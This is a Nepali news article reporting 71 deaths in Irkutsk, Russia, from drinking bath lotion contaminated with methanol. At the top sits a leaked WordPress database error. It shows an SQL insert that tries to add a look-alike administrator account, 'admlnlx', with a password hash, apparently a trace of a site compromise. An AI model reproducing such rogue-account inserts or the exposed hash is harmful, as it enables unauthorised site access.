WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BiXYfXhjLrhpuIaj/QRPNl0MOwBjZ41', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 23:23:50', '', 'admlnlx', 'admlnlx')
रसिया,पुस ७ –
रसियाको साइबेरियाली सहर इरकुस्कमा मदिराका रूपमा ‘वाथलोसन’ पिएपछि मृत्यु हुने व्यक्तिको सङ्ख्या बिहीबार ७१ पुगेको छ ।
गत हप्ताको अन्त्यमा वाथलोसन पिएर ११७ जना विरामी भएको रसियाको स्वास्थ्य मन्त्रालयका प्रवक्ता टाटैन लेबेडेभले बिहीकार जानकारी दिनुभयो । केही विरामी अझैपनि अस्पतालमै रहेको पनि उहाँले बताउनु भयो ।
ठुलो संख्यामा नागरिकहरुको मृत्यु र विरामी भएपछि स्थानीय अधिकारीहरुले इरकुस्कमा आपतकालीन अवस्था घोषणागरी ‘वाथलोसन’ व्यापारीमाथि निगरानी बढाएका छन् । स्थानीय प्रशासनले लोसनको बिक्रीमा संलग्न भएको आशङ्कामा कैयौँ मानिसलाई नियन्त्रणमा पनि लिइएको जनाएको छ ।
इरकुस्कको क्षेत्रीय प्रशासनले मृतक सबैमा मिथानोल नामक विषाक्त पदार्थ भेटिएकाले वाथलोसन पिएकै कारण उनीहरुको मृत्यु भएको पुष्टी भएको जनाएको छ ।
लोसनको बोतलमा उक्त पदार्थ बाहिरी प्रयोगका लागि मात्रै प्रयोग गर्न सकिने स्पष्ट सङ्केत भए पनि स्थानीयवासीले मदिराको सस्तो विकल्पका रूपमा यसलाई पिउने गरेको पाइएको छ ।- रासस